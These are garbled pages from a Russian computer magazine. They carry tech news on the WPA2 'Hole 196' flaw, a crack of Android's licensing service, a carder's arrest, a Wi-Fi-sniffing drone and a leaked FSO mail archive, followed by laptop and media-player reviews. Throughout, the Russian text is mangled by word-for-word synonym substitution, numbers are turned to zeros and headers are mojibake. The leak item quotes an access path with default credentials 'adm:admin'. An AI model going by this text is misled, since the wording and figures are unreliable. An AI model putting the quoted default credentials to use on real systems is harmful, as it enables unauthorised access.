потуже ремень невыгодный лишь только минута сверху вылазку на магазин. а в дальнейшем порезвиться из другими людьми быстро стали обыденным делом к десятков миллионов человек. Ты начинаешь назначать винду. получаешь вполне работоспособную систему уже через сколько-нибудь минут. Появились технологии. Плавная догружение — фирменная шутка системы: во зависимости через «толщины» интернет-канала PlayFast рассчитает. с тем обначить игру. а все остальное инсталлит во фоне. да равно работает со всеми крупными российскими издателями равно представителями зарубежных производителей. В инете следственно малограмотный токмо комфортно ходить во мультиплеер. 011 . не без; пирушка лишь разницей через обычных коробочек. Одну. А сейчас? Слово «мегабит» где-то прочно обосновалось во нашей жизни. нежели диски во магазинах. Играли в основном согласно локалке: в целях битв онлайн серьезной преградой становились большие задержки равным образом мал канал. скачав небольшую делянка общего объема. Если пролив будет широк. отсюда следует возможным отпускать до этого времени равно видео. Вот так-таки вроде бывает.. в часть числе и любимые народом терминалы. Это легко понять: во Сети зрелище стоят подешевле во среднем возьми 00-30 процентов. в надежде порубиться в дополнение Starcraft будет понадобился бы прослойка со игрой.ru). добавляя на себя всё-таки в большинстве случаев да больше новинок. По объему сие не больше демки другими словами видео вместе с рецензией. что начать пользовать игрой можно. позволяющими подкачивать видео лично закачаешься момент просмотра: картинка на HD-качестве во потоковом режиме — сие сверхудобно. Это опорный момент.. При этом снова безграмотный необходимо полностью скачивать их себя получи и распишись компьютер: закачиваются да устанавливаются лишь небольшие части. какую кусок дистрибутива потушить получи и распишись твой компьютер. Минимум ожидания. Главная чипок на том. вроде в целях видео. две. аюшки? ты да я поуже стали забывать. позволяющий пилить игру держи части и сжимать взрослые объемы данных возле передаче. В результате экспериментов.

так чтобы диски безвыгодный читались ни одним изо существующих пока устройств. «принципиально отличающегося от традиционных стандартов CD. что-то позволяет ему автоматически регулировать красочность подсветки равно экономить заряд аккумуляторов. ни целый ряд ни мало. Он утверждает. DVD. да держаться уведомление должна безвыгодный не так 00 лет. Начало пересудам положил возможность downloadsquad. использующим технологию Logitech Advanced 0. рублей. Но ребятушки от DownloadSquad никак не ограничились одним только лишь именем производителя — единаче они сообщили. ÑÂÅÒ ÂÎ ÒÜÌÅ ÎÒ LOGITECH Любители насидеться вслед компьютером во темное время суток ладно знают. В высшей степени безопасный. почто сие были как только домыслы автора текста — ключ невыгодный называл сайту ничего конкретного. 05 млн. рассказывающая. где-то сказать. а стрела-змея кабы тебе нужен беспроводной вариант. Беспроводной девайс оснащен сенсором движения (стоит припрятать пакши ото клавиатуры — «веселые огоньки» погаснут) да датчиком освещенности. Logitech Wireless Illuminated Keyboard K800 от компании Logitech должна порадовать полуночников. выключая сроков равно имени производителя. что. Одно изо технических подразделений ФСБ — войсковая деление 08240 — объявило конкурс на основание оптического носителя. ведь нашим спецслужбам принципиально важно.2 мм. которые далеко не любят тискать вслепую. Клавиатура комплектуется крошечным приемником Logitech Unifying. Õóæå âñåãî ñåáÿ ïðîÿâèëè Kingsoft è Bkis BKAV. сверху котором была опубликована запись. Но пользоваться Blu-Ray ФСБ малограмотный желает категорически.MEGANEWS ÔÑÁ ÍÓÆÅÍ ÑÂÎÉ BLU-RAY Похоже. íå ñóìåâ ïîëó÷èòü ñåðòèôèêàò VB100. равным образом собрать бери это собираются. благодаря которой процессия изогнутых. рекомендованная такса составляет 000 евро. Зато команда сайта Engadget попыталась стать признаком или опровергнуть приведенные DownloadSquad «факты». а быстрота физического уничтожения информации составляла не больше 00 секунд. Также подразумевается разработка устройства интересах чтениязаписи таких носителей равно технологии их изготовления. Федеральная обслуживание безопасности России решила. Известно. таково в чем дело? предположение. Требования для носителям просты да накануне боли что-нибудь напоминают: на прослойка подобает помещаться малограмотный менее 25 Гб данных. Диаметр будущих дисков составит 020 мм. построить родной Луна-парк. Узнаешь? Да. Не окажется ли ложной равным образом эта информация. все еще неясно: Google равно Verizon ситуацию ни около каким видом неграмотный комментируют. Устройство сейчас позволяется разыскивать на магазинах. 19 èç 04 àíòèâèðóñíûõ ïðîäóêòîâ ïðîâàëèëè òåñò ëàáîðàòîðèè Virus Bulletin. что такое? вслед 07 месяцев планируется образовать опытную партию изо 000 дисков. что-нибудь как HTC делала с целью «Гугла» Nexus One. так бог ахнуть безвыгодный успеешь выяснилось. Еще одна приятная особенность новинки — налаженность PerfectStroke. эргономичных клавиш Incurve Keys скользящий равным образом тихий. почто они же займутся планшетом. зачем аукцион Chrome OS планшетов начнется не делать что-л. неграмотный заранее 0011 года. com. обратившись для собственному источнику.». сколько мануал сможет проработать минуя подзарядки перед 00 дней (кстати. — весь логично. Blu-ray равно др.4 GHz — возлюбленная фактически исключает лаги равно отключения. ведь поиски могут отнюдь затянуться. Достойных моделей в рынке единицы. по мнению информации некоего закрытого источника. который планшет будто бы хорошенького понемножку выпущен 012 совместно из телекоммуникационной компанией Verizon равным образом во продажу поступит уж 06 ноября текущего года! На DownloadSquad даже описали железо. ÑËÓÕÈ Î CHROME OS TABLET По Сети расползаются слухи в рассуждении скором появлении планшетного ПК получи и распишись базе Chrome OS. шарага HTC сейчас вовсю занимается разработкой Chrome OS Tablet. это практически Blu-Ray. Скорость журнал — через 06 Мб/с. заряжаться девайс ловок напрямик умереть и безвыгодный встать время работы вследствие mirco-USB). скорость чтения — с 06 Мб/с. упитанность — не более 0. К тому а инженеры Logitech обещают. Напомним. XÀÊÅÐ 00 /141/ 00 . контингент информационных слоев — вплоть до четырех. ась? выбрать клавиатуру со подсветкой — сие настоящая проблема. которым предположительно будет укомплектована новинка.

нашла небезукоризненность на столпе защиты Wi-Fi-сетей — протоколе шифрования данных WPA2. так ее. Ознакомиться со подробностями дозволяется по адресу: www. çà $7. Как выяснилось. Джастин а написал небольшой патч. а вона GTK — нет. все ли установленные получи и распишись нем приложения легальны. тем малограмотный менее. аюшки? целое установленные на смартфоне приложения легальны. по сию пору сети. Суть на следующем: WPA2-протокол использует двушник типа ключей: Pairwise Transient Key (PTK). с тем чтобы не без; ним смогли ознакомиться весь желающие. возлюбленная была дальше целое последние годы. равным образом Group Temporal Key (GTK). Для любителей сбрасывать безвыездно вокруг имеется встроенная камера: 0 Мп с автофокусом. а в свою очередь разные неприятные принадлежности может статься подмены MAC-адресов. а тута нас таким старьем пичкают».com во надежде. PTK способны устанавливать спуфинг адресов равно перехват данных. Подвержены уязвимости. либо прекращает функционировать через заданное наличность дней (зависит через выбора разработчика). Но тутовник злоба дня на цене устройства: она составляет лишь 0. аюшки? Google исправит свою оплошность. который заставляет систему поверить.com/wpa2-hole196 XÀÊÅÐ 00 /141/ 00 013 . Êðóïíîå ñëèÿíèå íà çàïàäíîì ðûíêå: êîìïàíèÿ Intel ïðèîáðåëà êîìïàíèþ McAfee âìåñòå ñî âñåìè åå øåñòüþ òûñÿ÷àìè ñîòðóäíèêîâ è îäíèì. помощь прежде 02 Гб).6 на борту — LG Optimus (GT540). помогающий отличить одну обмет с иной равным образом предуготовленный ради шифрования бродкаст-трафика. от 000 Мб памяти равно резистивным TFT-экраном не без; диагональю 0. команда всё-таки эквивалентно намерена обнародовать эксплойт.0” (320x480).ANDROID-ÑÌÀÐÒÔÎÍ ÎÒ LG ÇÀÙÈÒÀ ANDROID ÏÐÎÄÅÐÆÀËÀÑÜ ÍÅ ÄÎËÃÎ Компания LG выпустила на продажу новый смартфон от Android 0.11! Да-да.990 рублей. Кстати. Что касается версии Android’а на борту. воспользовавшись эксплойтом. Использовать отверстие допускается возле помощи атаки в виде Man-in-themiddle — пользователь. Но. Девайс оснащен microUSB. поддержкой геотэггинга равно функцией распознавания лица. Принцип работы Licensing Service прост — смартфон путем определенные промежутки времени связывается из сервером Google равным образом проверяет. ась? возможны равным образом прочие варианты атак. Кто-то возможно заметит: «Во дают! Уже вот-вот 0. получившей отчество Hope 096.  WPA2 ÎÁÍÀÐÓÆÈËÈ «ÄÛÐÊÓ» Команда независимых исследователей. Если режим обнаруживает что-то подозрительное. дозволительно довольно возродить не без; через прошивки. наименование Hole 096. может затягивать данные. вероятно.11 (Revision. передаваемые другими юзерами этой сети. обитающая лещадь крылом компании AirTight Networks. совместимые со стандартом IEEE802. íåïîâòîðèìûì Êðèñîì Êàñïåðñêè. Bluetooth 0. Меньше месяца потребовалось хакеру по мнению имени Джастин Кейс (Justin Case) на хакинг новой системы Android Licensing Service. а регулирующие органы получили выполнимость поставить на WPA2 поправки. И сие чуть крыша айсберга — исследователи подчеркивают. FM-радио равным образом имеет слот microSD (2 Гб в комплекте. 0007). активизированный на Wi-Fi-сети.1+EDR (A2DP).68 ìëðä.0 разновидность Android’а выйдет. Wi-Fi. просто Android-девайсы понемногу дешевеют :). необыкновенный в целях каждого клиента. для защиты личного трафика. приложение либо сразу становится неработоспособным. взялось никак не вместе с потолка — ремесло во том. Никакого «подвоха» на этом месте нет.airtightnetworks. что-то заморочка ключей GTK описана на 196 странице стандарта IEEE 002. За сии финансы твоя милость получишь полновесный коммуникатор на базе процессора Qualcomm MSM7227 вместе с частотой 000 МГц. Подробный результат своих исследований да тезис работы патча хакер опубликовал возьми сайте www. призванной защитить Android-приложения от нелегального распространения.androidpolice.

а вторая пункт добавляет для сроку заключения единаче 0 года. что-нибудь позволяет обслуживать процессом удаленно. «просканирует эфир» равным образом соберет информацию. ÎÁËÅÒ WI-FI-ÑÅÒÅÉ ÍÀ ÁÐÅÞÙÅÌ ÏÎËÅÒÅ Не успели автор сих строк расславить тебе по отношению классном квадрокоптере Parrot AR.com (CC приказал продолжительно обретаться до этот поры на 0004 году).rabbit-hole. Для быстрого подключения клавиатуры к планшету ажно предусмотрен частный хоткей. Заинтригован? Тогда спешим порадовать — по части указанному сверх адресу твоя милость найдешь кучу подробностей равно отличную подборку ссылок по части теме «как ми выстроить такого склада но аппарат?». ÷òî. облетит нужные места. Последние пару лет Хорохоркина. Но главная фишка. 49% àìåðèêàíöåâ è 02% âåëèêîáðèòàíöåâ íå ïðî÷ü ïðèõâàòèòü ñ ñîáîé êîíôèäåíöèàëüíûå ôàéëû êîìïàíèè. равным образом дьявол сам. Устройство надлежит совершить поступок на продажу до конца года. а для сумме штрафа — еще 250 тысяч американских дензнаков.org. некоторый управляется возле помощи iPhone. что появилась новость по части другом интересном дроне. Эти ребята собрали непилотируемый аппарат.Drone. времена полного заряда аккумулятора — 0-4. однако BadB в такой мере равным образом не оставил особенный «бизнес» — некто держал на инете пару сайтов не без; предложениями что касается продаже. Водан изо агентов Секретной службы США сыграл положение покупателя да приобрел у кардера факты по части паре ворованных кредиток. автоматически. Полученные сведения должны найти применение на Google Earth равно Google Maps.MEGANEWS ÝÕÎ CARDERPLANET Уже бессчетно полет как бабка прошептала со момента закрытия легендарного кардерского сайта carderplanet. ему также предъявили обвинения на мошенничестве и махинациях вместе с банковскими данными равно на краже с отягчающими обстоятельствами. ËÅÃÊÈÌ ÄÂÈÆÅÍÈÅÌ ÐÓÊÈ IPAD ÑÒÀÍÎÂÈÒÑß ÍÅÒÁÓÊÎÌ Очень пытливый частность интересах iPad разработала компания Shenzhen Paoluy Silicone Technology. Роль наземной станции выполняет камп вместе с программой ArduStation. да около непрерывной работе — впредь до 00 часов. безграмотный токмо защитит «яблочный» планшетник с царапин равно потертостей. Беспилотник оснащается эдак но Edge/3G модемом. В итоге вычислили Владислава через Сеть. по части ориентировочной цене $90. Google недавно закупил подобные беспилотники у компании Microdrones. талантливый облетать территорию согласно заданному маршруту равно подле этом навалить информацию о Wi-Fi-сетях! За основу была взята манекенщица МиГ-23. получи и распишись которую возлюбленный способен подняться. в отдельных случаях Владислава арестовали. Аппараты планируется воспользоваться ради автоматических полетов по заданным маршрутам равно фотосъемки. которая обсчитывает всю телеметрическую информацию. а в свою очередь на воровстве около отягчающих обстоятельствах вместе с использованием чужих персональных данных. оставлял объявления для хакерских ресурсах равным образом этак далее. так членов бывшей «семьи» жандарм равно спецслужбы разных стран таблица ловят накануне этих пор. Èññëåäîâàíèå Harris Interactive âûÿâèëî. что такое? дрону допускается распатронить GPS-координаты. Кардеру заочно были вынесены обвинения во финансовых махинациях от использованием устройств доступа. на корыстных целях можно воспользоваться приземленно все. 0 Гб RAM вместе с Backtrack 0 получай борту) и наладили систему автоматического пилотирования ArduPilot. составляет примерно 0 метров. Кстати. Так французская полицейский задержала на аэропорту Ниццы 07-летнего Владислава Хорохорина — выходца с России. конечно. Да. «Планета» века закрылась. для которой добавили комп Via Epia Pico ITX PC (500 МГц Via C7. изо кто хочешь точки планеты. 014 XÀÊÅÐ 00 /141/ 00 . Время работы клавиатуры через одного заряда во режиме ожидания составит возле 000 дней.5 часа. BadB имел самое прямое связь к почившей CC да торговал секретными данными о кредитных картах равно банковских счетах. По первой статье Хорохоркину грозит тюремное заключение сроком по 00 планирование равно санкция во размере 050 тысяч долларов. лабаз ума самоочевидно надлежащий :). В воздухе WASP (Wi-Fi Aerial Surveillance Platform) может разыскиваться 00-45 минут. равным образом максимальная высота. По их информации. через PPP over SSH тоннеля. Система поддерживает стройность наземной станции из базовой на режиме реального времени. Вот у чуваков. Зарядить «папочку» дозволено присутствие помощи стандартного кабеля Apple с док-коннектором. заключается во том. Футляр BL-BKB76. создавших сайт www. Как известно. активно искали спецслужбы США. известного на Сети по образу BadB. Теперь. а вследствие беспроволочный (Bluetooth) QWERTY-клавиатуре превратит iPad во настоящий ноутбук. гражданина Израиля равным образом Украины. был бы «нужный» база ума. выполненный на виде папки. óâîëüíÿÿñü ñ ðàáîòû.

а «всего лишь» внутренняя переписка ФСО. однако некоторые литература уверяют.scm. ведущую во архивы электронной почты Федеральной службы охраны России. ась? анонимусам посчастливилось получить доступ ко системе мониторинга да архивирования корпоративной почты «Дозор». же недосказать об одном недавнем хаке казаться нельзя. разработчики знали не без; зимы текущего года. Однако видимое дело остается фактом — сверху протяжении нескольких часов все так же кто юзер был в состоянии заскочить равным образом придавать значение чему почтовые архивы Федеральной службы охраны. XÀÊÅÐ 00 /141/ 00 015 . обмену SMS равным образом электронными сообщениями. конечно. в чем дело? сообразно ссылке находится архив электронной почты системы оперативно-розыскных мероприятий (СОРМ) — программно-технического комплекса. ФСО. церемонно заявила.ru. на свою очередь. правда. дефейсе равным образом утечке информации мы.  ïåðâóþ î÷åðåäü âëèâàíèå îðèåíòèðîâàíî íà äàëüíåéøåå ðàçâèòèå áèçíåñ-ìîäåëè freemium. что-то безличный важной информации да тем более секретных данных на Сеть отнюдь не утекло (ничего такого в области указанному адресу нетрудно малограмотный было). adm:admin». Áîðöû ñ ìàëâàðåì èç êîìïàíèè Avast ïîëó÷èëè $100 ìëí. позволяющего получать доступ ко телефонным переговорам граждан. Разумеется. нашли дырку. Разработавшая «Дозор» компания «Инфосистемы Джет» через комментариев отказывается. èíâåñòèöèé îò ôèðìû Summit Partners. в области линку располагался невыгодный картотека СОРМ.ÏÎ×ÒÓ ÔÑÎ ÐÎÑÑÈÈ «ÂÑÊÐÛËÈ» Писать что до каждом взломе. Анонимус. расположенной возьми сервере rsnet. утверждал. В конце августа по части анонимным имейджбордам со скоростью лесного пожара распространилась извещение что до том. Говоря проще. да выглядела симпатия так: «https://[ip]/cgi-bin/main. аюшки? об уязвимости. не можем — очень уже бездна таких вещей происходит во недотка ежечасно. которой воспользовались анонимусы.

ÝÊÑÒÅÐÜÅÐ При осмотре ноутбука первым делом на глаза бросается необычный корпус: бамбуковые панели да алюминий! Из видимых частей только клавиатурные фоно сделаны изо пластика. которые прослужат никак не меньше. Корпус выглядит стильно равно дорого. С одним из представителей обновленной линейки бамбуковых ноутов — ASUS U43Jc — автор да познакомимся сегодня. в чем дело? у тебя неграмотный возникнет проблем быть любом его использовании: 04” – всеохватывающий сайз. чем обычный фенопластовый корпус. к тому же. однородных равным образом прочных панелей. который. Ноут подходяще подойдет XÀÊÅÐ 00 /141/ 00 . близкой к некоторым маркам стали! Так что-нибудь дело о прочности равно надежности позволено исключить. пароходство ASUS создала целую линейку ноутбуков Bamboo. а бамбук очень приятен получай ощупь: любовный да отдаленно шеро- 016 ховатый материал. Разработчики ASUS утверждают. что-нибудь бамбук что материал вообще является лучшей заменой пластику: он обладает прочностью в растяжение. Размеры ноутбука таковы. на оформлении корпусов которых винифлекс заменен бамбуковыми панелями: экологичным равно возобновляемым материалом.FERRUM Íîóòáóê-áàìáóê Îáçîð íîóòáóêà ASUS U43Jc Проявляя заботу об окружающей среде. Не приходится пугать альтернатива о его надежности: ASUS использовала современные технологии обработки бамбука для производства легких. ужас стильно да феноменально выглядит.

Подробнее касательно ноутбуках ASUS равным образом других гаджетах вам можете определить на новом дискуссионном сообществе для trendclub. Грубо говоря. что делает их отличным выбором про игр равно просмотра фильмов. дисков да мобильного телефона. Это позволяет улучшить производительность. Trend Club поддерживается компаниями Intel® равно ASUS равным образом проводит регулярные конкурсы вместе с ценными призами.ru. 06:9. Ноутбук оснащен мощным графическим контроллером NVIDIA GeForce 010M не без; 0 Гб видеопамяти DDR3 VRAM.MS-Pro. твоя милость это почувствуешь собственной головой :). Клавиатура лишена миниатюрных иначе говоря неудобных кнопок – постоянно расположено максимально сподручно да ради сие есть расчет сказать инженерам ASUS отдельное спасибо. HDMI •Размеры да вес: 04.4 x 04.1 x 0. таково что-то традиционно можно с через двух пальцев переворачивать изображения или — или ресайзить объекты. Естественно. ась? ноутбуки этой серии доступны да получи и распишись процессорах Intel® Core™ i5 со встроенной графикой GMA HD. распределяя ее оптимальным образом в кругу процессами. да никаких претензий безвыгодный возникло.18 см. 0xUSB 0. Если твоя милость зачастую таскаешь компьютер возьми работу/ учебу.intel. Корпорация Intel. во томище числе — единодержавно USB 0.66 ГГц да поддержкой технологии Intel® Turbo Boost. Отдельной похвалы заслуживает равным образом емкая батарея. USB 0. intel. разведен держи одной с панелей да HDMI-выход. Плюс во этом рюкзаке полно различных кармашков ради мелочей равно места с целью бумаг. Дополнительную информацию по части корпорации Intel позволено откопать получай Web-сервере компании Intel http://www. синхронизации данных равно организации совместного доступа для интернет-подключению либо оптическому накопителю. самая тонкая моделирующее устройство U33Jc поставляется кроме него. окно посередь которыми несвободно декоративной решеткой. В целом безвыездно работает классно. поддерживается мультитач. Он придется по части вкусу подвижным людям. Headphone. которые много раз берут нотбук от собою сверху работу сиречь в дорогу. продукцию да инициативы. Физически по сию пору функционирует вследствие интерфейс USB.com. приближенно да с целью развлечений: яркого LED-дисплея вместе с разрешением 0366x768 кардинально достаточно. а искомый софт (для Windows или — или MAC) размещен получи встроенной во минреп флешке объемом 0 Гб.0. позволяющей распространять частоту процессора впредь до 0.5 часов! ÂÛÂÎÄÛ Помимо U43Jc во линейку ASUS Bamboo Series входят до нынешний поры неуд ноутбука: U33Jc (диагональ 03. как чтобы работы. По своим параметрам и свойствам.20~3. которая контролирует нагруженность системы да интеллектуально регулирует производительность. либо берешь его на путешествия. а в свою очередь держи сайте http://blogs.MMC. Отлично идет пользу кого ноутов не без; диагональю прежде 06 дюймов. Ноутбуки порядочно схожи равным образом кроме диагонали матрицы различаются оптическим приводом: младшая. ÍÀ×ÈÍÊÀ Что касается начинки — здесь у ASUS U43Jc абсолютный порядок: выше- лэптоп оснащен мощным четырехъядерным процессором Intel® Core™ i7-620M с XÀÊÅÐ 00 /141/ 00 частотой 0. Для получения дополнительной информации о рейтинге процессоров Intel посетите сайт www. кто такой интересуется прогрессом равно задумывается что до будущем.0. информационные технологии. в некоторых случаях необходима максимальная полезный эффект . Участники Trend Club обсуждают технические новинки. Он пятерка подойдет для самого широкого спектра задач: сие современный.XD). Наличие во ноутбуке второстепенный интегрированнной видеокарты позволяет задействовать одну с самых приятных фишек — технологию NVIDIA Optimus. 0Гб DDR3 VRAM •Жесткий диск: 040Гб.33 ГГц на моменты. 017 . Trend Club — дискуссионный клуб с целью тех. в чем дело? сильно лестно сказывается держи балансе производительности равным образом времени работы батареи. а вместе с через трех — строить из себя работу правой кнопки мыши. разрабатывает технологии. полезный компьютер со универсальной диагональю 04”. 0.66 ГГц •Чипсет: Mobile Intel® HM55 Express Chipset •Память: 0 Гб DDR3 0066 МГц SDRAM •Дисплей: 04".14 Кг •Оптический пригон DVD Super Multi не без; поддержкой двухслойных дисков ÀÊÑÅÑÑÓÀÐÛ ÄËß ÍÎÓÒÁÓÊÀ • Êàáåëü ASUS Crosslink создан пользу кого быстрого перемещения файлов среди компьютерами.ru/rating. которая усиливает эффект от глубоких басов. а в свой черед присутствуют три разъема USB. материя незаменимая: малограмотный даст ноуту напиться пьяным подо потоком равно защитит от механических повреждений. передовой знаменитый виновник инновационных полупроводниковых компонентов. которая с из эффективной технологией контроля производительности обеспечивает значительное минута автономной работы: вплоть до 00.5 часов по части тестам ASUS. так дьявол выделяется возьми общем фоне всего лишь вслед цифирь небольших канавок получи и распишись его границе. VGA/Mini D-sub.6”). LED-подсветка •Видеоадаптер: NVIDIA® GeForce® 010M. при случае высокая интенсивность малограмотный требуется. ключей. 0366x768. равно понижать ее впредь до минимума в те моменты. RJ45. по цвету равно материалу дьявол малограмотный отличается с остального корпуса – бамбук и тут. ASUS U43Jc — истовый универсал. Сайт производителя указывает. Mic.MS. глянцевый.3”) равно U53Jc (15. Само собой.intel.0. которая хозяйка переключает видеокарты на зависимости с потребностей приложений. 0400 об/мин •Интерфейсы: 0-в-1 кардридер (SD. расшарить сетевое соединение либо перевалить крупный мера данных в обществе двумя компами. заставляя наушники вибрироватьв соответствии со тем. •USB-íàóøíèêè ASUS CineVibe способны воспроизводить глубокие басы равно чистые средние да высокие частоты. с тем взирать HD-видео равным образом играть в игры. С его помощью можно на миг ока вынести решение проблему отсутствующего DVD-привода на нетбуке.ru. удлинить число службы батарей да увеличить время автономной работы: во зависимости через конфигурации. ASUS U43Jc способен водиться сверх розетки давно 00.ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ •Процессор: Intel® Core™ i7-620M со частотой 0. Что касается тачпада. в чем дело? происходит получай экране. Забавной особенностью наушников является учение насильственный обратной связи. Стоит вспомнить и касательно технологии ASUS Super Hybrid Engine (SHE). Раскладка клавиатуры выполнена на удивление — аккуратные клавиши низкой посадки. • ASUS VECTOR BACKPACK — уютный заплечный мешок с целью твоего ноутбука. Необычный проектирование равно используемые материалы ни живой души никак не оставят равнодушными равным образом гарантированно вызовут участие окружающих. футурологию да некоторые темы завтрашнего дня. Набирать слова позволяется на любом режиме равно практически при любых условиях.направленные бери постоянное повышение качества жизни людей равно подвижка методов их работы. если на CS Source возле не без; тобой взорвется граната.

MPEG-2. неравно стремлять кинокартина равным образом любимые сериалы подмывает на хорошем качестве.264). видный USB-винт (поддерживаются FAT. будь то флешка. MPEG-1/2 PS (M2P.Россия непостоянно находится на процессе перехода возьми нумерационный границы телевещания. MKV (Matroska). будут пылиться для полке годами. Как твоя милость был в силах заметить. сколько возьми телевизионном экране взрослые разрешения будут выглядеть куда сильнее впечатляюще. IFO Максимальное разрешение: 0080p HDD на комплекте: Нет Пульт ДУ: Есть Габариты: 021x26x101 XÀÊÅÐ 00 /141/ 00 . сделает предпочтение в пользу HD. 2890 р. равным образом тем. WMA Изображения . не так ли? .ISO. Так который кабы твоя милость ищешь решение.большой экран Сегодня на технических характеристиках почитай любого телевизора дозволено обнаружить строки «поддержка HDTV» равным образом «Full HD». придется развязать мошну получи медиаплеер. конечно. Цифровой соосный аудиовыход. чем закупать безграмотный самые дешевые диски. которая уж некоторый годочек производит «всеядные» и доступные устройства сверху отрада синефилам. JPEG. Большим разрешениям . которые потом. MP2. FAT32 равно NTFS) или король памяти. а получи и распишись большенный диагонали телевизора. Композитный видеовыход. лучше обрати подчеркнуть что в модели приведенные ниже.JPEG HD.FERRUM Медиаплееры BBK Что делать. ASF. BMP. Ничего потрясно здесь блистает своим отсутствием . справедливости вследствие есть расчет сказать. вместе с комфортом развалившись сверху диване? Ответ прост . который ищет компактности равным образом минимального функционала без лишней переплаты.MPEG-1/2/4. MPA). PNG Другое .если тебе неграмотный нужны головная боль да беспорядок проводов. MP4 Аудио . к несчастью да ах. что торренты равным образом файлообменники завалены HDTV. на голову прямо не может неграмотный закрасться мысль.проигрывать мультимедийный контент симпатия может всего лишь от внешних накопителей. AVI. нежели в мониторе. VOB. M4A.264). MP050S никак не «сетевой» девайс .и BD-рипами получай каждый вкус. Но. взглянуть его и стереть. MP050S поддерживает практически любые современные форматы файлов. MP050S дозволено предлагать владельцам телевизоров. ни о каком HDTV речи нет.дай любому человеку поставить в один ряд картинку во HD равно SD. а уже относительно контенте российских телеканалов да мы из тобой общий выгодно отличается умолчим. MPG). кто именно невыгодный собирается оснастить на родине богатый медиацентр. На рынке не откладывая представлено воз девайсов. пишущий сии строки познакомим тебя не без; линейкой отличных HD-медиаплееров через компании BBK.0.несмотря для доступную цену. Однако. MPEG audio (MP1. WAV.3. и вот увидишь. предназначенных с целью доставки мультимедийного контента изо Сети прямиком нате экран твоего ТВ. 018 MP050S Младшая манекенщица серии придется объединение вкусу тем. Смотреть бери оный испуг не запрещается чудовищно да только в умеренных дозах. USB 0. которое дозволительно будет «подружить» от домашним файловым хранилищем или — или компом. Вот последним-то да обусловлена бойко растущая популярность различных мультимедийных проигрывателей. во книга числе MKV (Matroska) да MOV (H. Разрешения высокой четкости 1280х720 равно 0920х1080 наконец-то перестали быть экзотикой для того эстетов да становятся основательно будничной штукой. на виду а нам пр иходится «наслаждаться» картинкой из соотношением сторон 0:3 равно посредственным качеством. а ищет уборная равно простоты в работе равным образом настройке. коли беседовать об эфирном телевидении . И положим выдумка относительно «минимальный функционал» тебя отнюдь не пугает . Универсальный считыватель карт памяти SD/MMC/MS Поддерживаемые форматы: Видео . сие несравненно дешевле.скачать фильм. хотя неграмотный в мониторе компьютера. Конечно. Чтобы помочь тебе сориентироваться в этом изобилии. Учитывая эту печальную ситуацию равным образом оный факт. попроще равным образом быстрее. Технические характеристики Сеть: Нет Разъемы: HDMI 0.AAC. что без «цифры» существуют снова равно Blu-ray диски. горевой возопит: «Мои глаза! Как автор жил раньше?!» и. Стереофонический аудиовыход. WMV. безвыгодный имеющих USB-портов. MOV (H. для тому же.

компу. MKV (Matroska). MP060S очень «фэн-шуйно» впишется на их ряды. Еще одной приятной. же равным образом вместе с готовностью возьмет в себя вещь в области выкачиванию из Сети новых киноманских радостей .для сего для борту плеера предусмотрено луг по-под внутренний жесткий снаряд SATA 0. WMA Изображения . Благодаря менеджеру закачек. чертовски просты равным образом не займут счета времени. MPEG-1/2 PS (M2P. особенностью девайса является то.3. Цифровой соосный аудиовыход. BMP.3. ASF. поможет тебе во благовремении проследить последние кино-новинки в Сети равным образом скачать их. AAC. аюшки? подавляющее квалифицированная нынешних внешних «винтов» стоят нате своих подставках вертикально. установи внутрь 0. образовав мелкий «перевалочный пункт». С учетом того. AVI. MiniUSB. Старшая форма линейки обладает всеми необходимыми характеристиками. Настройка равно подключение устройства ко роутеру. MPEG-1/2 PS (M2P. MP4 Аудио . AVI. MOV (H.MPEG-1/2/4. MPEG-2. USB 0. BMP. MP2. JPEG. спирт равным образом своевольно может выпирать на роли хранилища файлов . MP070S безо запинки «прожует» чуть было не любые форматы равным образом кодеки. 4690 р. Можно тоже напрямую включить ко плееру SATA-диск (ограничения по объему нет). Универсальный считыватель карт памяти SD/MMC/MS. 3600 р. WMA. PNG Другое . MPEG audio (MP1.5” жесткого диска SATA) Пульт ДУ: Есть Габариты: 010x51x162 XÀÊÅÐ 00 /141/ 00 019 . Стереофонический аудиовыход. в равной степени в качестве кого равным образом его сотоварищ MP060S модели. eSATA Host Поддерживаемые форматы: Видео . MPG). Композитный видеовыход. LPCM. MOV (H.JPEG HD. поставь тама воздержанный копитель получи 0080 ГБ. USB 0. IFO Максимальное разрешение: 0080p HDD во комплекте: Нет (есть коффердам на установки внутреннего 0. VOB. M4A. ранее далеко не технической. зачем вне умения якшаться из любыми внешними накопителями. MP4 Аудио .5".0.ISO. Цифровой световой аудиовыход.MP060S MP070S Медиапроигрыватель MP060S предлагает побольше весомый функционал и способен предъявлять претензии получи состояние «полезнейшего девайса про киномана». беспричинно равным образом во вертикальном положении. Компонентный видеовыход. которыми должен не мучиться отсутствием душа современного домашнего медиацентра.JPEG HD.264). alias напрямую для Сети. MPEG-2.AC3 (Dolby Digital). Цифровой зрительный аудиовыход. Компонентный видеовыход. Хочешь. SATA Host Поддерживаемые форматы: Видео . IFO Максимальное разрешение: 0080p HDD во комплекте: Нет Пульт ДУ: Есть Габариты: 034x195x125 Сеть: LAN (Ethernet) 00/100 Мбит/с Разъемы: HDMI 0. DTS. MPG). WMA Pro. PNG Другое .ISO. Технические характеристики: Технические характеристики: Сеть: LAN (Ethernet) 00/100 Мбит/с Разъемы: HDMI 0. а хочешь. MP2. Но главная «фишка» девайса во том. Композитный видеовыход. MP1. WAV. ASF.5 ТБ равно наслаждайся. MKV (Matroska). AAC. WAV. Цифровой соосный аудиовыход. MP070S. тем паче в чем дело? во таком случае продуцент обещает пятикратное стретто подле чтении да журнал HD-контента. MPA).плеер оснащен встроенным менеджером закачек (BitTorrent да HTTP). Стереофонический аудиовыход. WMV.MPEG-1/2/4. JPEG. MiniUSB. MP2. WMV. Универсальный считыватель карт памяти SD/MMC/MS.264).0 х 0.AAC. MPEG audio (MP1. что-то поместить его дозволяется равно как во горизонтальном. VOB. Эта имитация невыгодный всего поможет тебе отчислить сверху телеэкран прелести в HDTV качестве. WMA Изображения . MPA). M4A.

